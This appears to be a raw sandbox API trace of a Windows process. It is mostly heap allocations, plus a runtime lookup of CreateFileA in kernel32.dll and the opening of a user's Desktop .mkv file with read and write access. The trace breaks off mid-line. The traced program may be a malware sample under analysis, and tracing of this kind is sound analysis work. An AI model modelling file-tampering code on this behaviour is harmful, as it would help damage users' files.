1 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0161.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0161.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0161.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0161.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0161.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0161.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0161.440] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.443] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0161.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9b50 [0161.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0161.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.444] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0161.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0161.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9b50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0161.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.444] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0161.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0161.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0161.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0161.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x36) returned 0x90ad98 [0161.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv", cchWideChar=54, lpMultiByteStr=0x90ad98, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv", lpUsedDefaultChar=0x0) returned 54 [0161.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0161.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.445] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gv7qjagby9a.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0161.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0161.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=54, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6c) returned 0x906f38 [0161.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=54, lpWideCharStr=0x906f38, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv") returned 54 [0161.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0161.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0161.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0161.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0161.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0161.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.448] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: 